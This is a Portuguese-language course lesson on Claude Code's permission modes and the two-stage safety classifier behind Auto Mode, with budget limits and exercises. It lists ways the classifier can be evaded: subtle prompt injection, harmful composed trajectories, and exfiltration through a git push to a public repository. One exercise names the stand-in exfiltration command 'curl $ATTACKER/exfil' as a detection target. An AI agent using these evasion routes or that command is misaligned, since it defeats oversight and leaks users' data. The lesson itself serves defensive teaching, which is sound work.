Phase 15 - Lesson 10

Claude Code como um Agente Autônomo: Modos de Permissão e Auto Mode

O Claude Code expõe sete modos de permissão. "plan" pergunta antes de cada ação, "default" pergunta apenas para ações arriscadas, "acceptEdits" aprova automaticamente gravações de arquivos, mas ainda confirma a execução do shell, e "bypassPermissions" aprova tudo. O Auto Mode (24 de março de 2026) substitui a aprovação por ação por um classificador de segurança paralelo em duas etapas: uma verificação rápida de token único é executada em cada ação; ações sinalizadas iniciam uma revisão profunda de chain-of-thought. Orçamentos de ação são aplicados via max_turns e max_budget_usd. O Auto Mode foi lançado como um "research preview" (prévia de pesquisa) — a Anthropic declarou explicitamente que o classificador não é suficiente por si só.

Tipo: Aprender Idiomas: Python (stdlib, simulador de classificador em duas etapas) Pré-requisitos: Fase 15 · 01 (Agentes de longo horizonte), Fase 15 · 09 (Cenário de agentes de codificação) Tempo: ~45 minutos

O Problema

Um agente de codificação autônomo em sua máquina é uma categoria de segurança distinta. A superfície de ataque é tudo o que o agente pode alcançar — sistema de arquivos, rede, credenciais, área de transferência, qualquer aba do navegador, qualquer terminal aberto. Bruce Schneier e outros alertaram publicamente sobre isso: agentes de uso de computador não são uma "atualização de recurso" de chatbots, eles são um novo tipo de ferramenta com um novo tipo de perfil de risco.

O sistema de permissões do Claude Code é a resposta da Anthropic. Em vez de uma única chave de "autônomo / não autônomo", existem sete modos que abrangem uma escala de capacidade: plan → default → acceptEdits → … → bypassPermissions. Cada modo representa uma compensação diferente entre velocidade e revisão por ação. O Auto Mode (março de 2026) adiciona um classificador em duas etapas que remove a aprovação do caminho crítico do usuário para ações que o classificador julga seguras, ao mesmo tempo em que preserva uma camada de revisão para ações que o classificador sinaliza.

A questão de engenharia: o que esse sistema detecta, o que ele deixa passar e qual modo uma determinada tarefa realmente exige?

O Conceito

Os sete modos de permissão

Modo	Comportamento	Quando usar
`plan`	O agente propõe um plano; o usuário aprova todo o plano; cada ação é revisada antes da execução	Tarefa desconhecida; código próximo a produção; primeira vez usando o agente em um repositório
`default`	O agente executa ações; solicita confirmação do usuário para qualquer ação "arriscada" (execução de shell, operações destrutivas, chamadas de rede)	A maioria das sessões de codificação interativas
`acceptEdits`	Gravações de arquivos são aprovadas automaticamente; execução de shell e chamadas de rede ainda exigem confirmação	Etapa de refatoração em muitos arquivos
`acceptExec`	Comandos de shell são aprovados automaticamente dentro de uma lista de permissões selecionada; gravações de arquivos são aprovadas automaticamente	Loops internos curtos onde cada comando de shell é `npm test` ou similar
`autoMode`	Classificador de segurança em duas etapas; ações sinalizadas são enviadas para revisão	Execuções autônomas de longo horizonte em um espaço de trabalho restrito
`yolo`	Ignora a maioria das confirmações; ainda executa a lista de permissões/bloqueio de ferramentas	Sandboxes efêmeros, trabalhos de CI, scripts de pesquisa
`bypassPermissions`	Aprova tudo	Documentado como "apenas dentro de contêineres efêmeros que você está disposto a descartar"

(Os nomes acima correspondem aos documentos públicos do Claude Code; "yolo" é a abreviação informal para o meio-termo permissivo.)

Auto Mode em uma página

O Auto Mode (lançado em 24 de março de 2026) é o primeiro modo de permissão a delegar a aprovação por ação a um modelo. Estrutura:

Etapa 1 — classificador de token único. É executado em cada ação proposta. Barato. Retorna "safe" (seguro) ou "flag" (sinalizar). Projetado para rodar em paralelo com o loop principal do agente para que as ações aprovadas não fiquem presas em uma fila.
Etapa 2 — revisão secundária de política/segurança. É executada apenas em ações sinalizadas. Realiza uma avaliação focada de política e segurança sobre a ação, o estado atual da sessão e a tarefa declarada. Encaminha para o usuário (HITL - Human-in-the-Loop) se a confiança for baixa.

Os controles de orçamento ficam ao lado do classificador:

max_turns — total de iterações em uma sessão.
max_budget_usd — limite em dólares que aborta a sessão.
limites de contagem de ações por ferramenta (não mais que N chamadas WebFetch, etc.).

O que o sistema detecta

Injeção de prompt direta em entradas de ferramentas onde a instrução injetada corresponde a um formato de ação conhecido como arriscado.
Loops de ferramentas repetitivos — o classificador pode ver que a ação N+1 é quase idêntica à ação N, cinco vezes seguidas.
Comandos de shell claramente fora do escopo em uma sessão que de outra forma seria apenas de edição de arquivos.

O que o sistema pode deixar passar

Injeção de prompt sutil que modula o comportamento sem produzir nenhuma ação sinalizada. A injeção de prompt indireta não é uma vulnerabilidade totalmente corrigível (diretor de preparação da OpenAI, 2025, sobre agentes de navegador — veja a Lição 11).
Comportamento inadequado em nível semântico. Cada ação individual pode parecer segura enquanto a trajetória composta é prejudicial. O classificador julga a ação; ele não deduz novamente a intenção do usuário.
Exfiltração por meio de canais legítimos. Escrever dados em um arquivo que você possui e, em seguida, fazer um git push para um repositório público é uma sequência de ações permitidas cuja composição é o problema.

Enquadramento como prévia de pesquisa (Research Preview)

A Anthropic lançou o Auto Mode como uma prévia de pesquisa (research preview). A documentação é explícita ao afirmar que o classificador é uma camada, não uma solução: espera-se que os usuários combinem o Auto Mode com orçamentos, listas de permissões, espaços de trabalho isolados e auditorias de trajetória (Lições 12–16). O enquadramento como prévia de pesquisa também reflete a lacuna documentada entre avaliação e implantação (Lição 1) — um classificador que passa em avaliações offline pode se comportar de maneira diferente em uma sessão real onde o contexto do usuário é ambíguo.

Onde essa escala se encaixa no seu fluxo de trabalho

Tarefa desconhecida: comece em plan. Ler o plano é mais barato do que reverter uma execução ruim.
Refatoração conhecida: acceptEdits economiza muitos cliques de confirmação.
Execução em segundo plano sem supervisão: autoMode apenas dentro de um espaço de trabalho cujo raio de impacto você tenha medido (sem credenciais, sem montagens de produção, sem saída de dados que você não tenha autorizado expressamente).
Contêineres efêmeros: yolo / bypassPermissions is aceitável se, e somente se, o contêiner e suas credenciais forem descartáveis.

Use

code/main.py simula o classificador de duas etapas. A Etapa 1 é uma regra de palavra-chave barata sobre as ações propostas; a Etapa 2 é um revisor de múltiplas regras mais lento. O executor insere uma trajetória sintética curta (ações seguras, uma tentativa de injeção de prompt, um loop repetitivo) e mostra onde o classificador detecta e onde ele falha.

Envie

outputs/skill-permission-mode-picker.md associa a descrição de uma tarefa ao modo de permissão correto, limites de orçamento e isolamento necessário.

Exercícios

Execute code/main.py. Qual tipo de ação sintética nunca é sinalizado pela Etapa 1, mas é sempre detectado pela Etapa 2? Qual não é detectado por nenhuma delas?
Estenda o conjunto de regras da Etapa 1 para detectar um formato específico conhecido como malicioso (por exemplo, curl $ATTACKER/exfil). Meça a taxa de falsos positivos na amostra de ações benignas.
Leia o documento "How the agent loop works" da Anthropic. Liste cada estado externo que o agente toca por padrão no modo default. Quais você precisaria controlar separadamente antes de executar o autoMode sem supervisão?
Projete um orçamento para execução sem supervisão de 24 horas: max_turns, max_budget_usd, limites por ferramenta, listas de permissões. Justifique cada número.
Descreva uma trajetória onde cada ação individual é aprovada pela Etapa 1 e pela Etapa 2, mas o comportamento composto é desalinhado. (A Lição 14 aborda como botões de emergência e tokens canário lidam com isso.)

Termos-Chave

Termo	O que as pessoas dizem	O que realmente significa
Modo de permissão	"O quanto o agente pode fazer"	Uma das sete políticas nomeadas que controlam a aprovação por ação
Modo plan	"Perguntar antes de qualquer coisa"	O agente escreve um plano; o usuário aprova antes da execução
acceptEdits	"Deixar que ele escreva arquivos"	Gravações de arquivos são aprovadas automaticamente; a execução de shell ainda solicita confirmação
autoMode	"Aprovações automáticas"	Classificador de segurança em duas etapas; ações sinalizadas são escaladas
bypassPermissions	"YOLO total"	Aprova tudo; destinado a contêineres efêmeros
Classificador da Etapa 1	"Verificação rápida de token"	Regra de token único sobre a ação proposta; roda em paralelo
Classificador da Etapa 2	"Revisão profunda"	Raciocínio chain-of-thought sobre ações sinalizadas
Research preview	"Não disponível de forma geral (GA)"	Enquadramento da Anthropic para recursos cujos modos de falha ainda estão sendo mapeados

Leitura Adicional

Anthropic — How the agent loop works — modos de permissão, orçamentos, formato de ação.
Anthropic — Claude Managed Agents overview — modelo de execução de serviço gerenciado.
Anthropic — Claude Code product page — superfície de recursos e anúncio do Auto Mode.
Anthropic — Claude's Constitution (January 2026) — a camada baseada em regras/razão que molda os julgamentos do classificador.
Anthropic — Measuring agent autonomy in practice — perspectiva interna sobre o design de permissões de longo horizonte.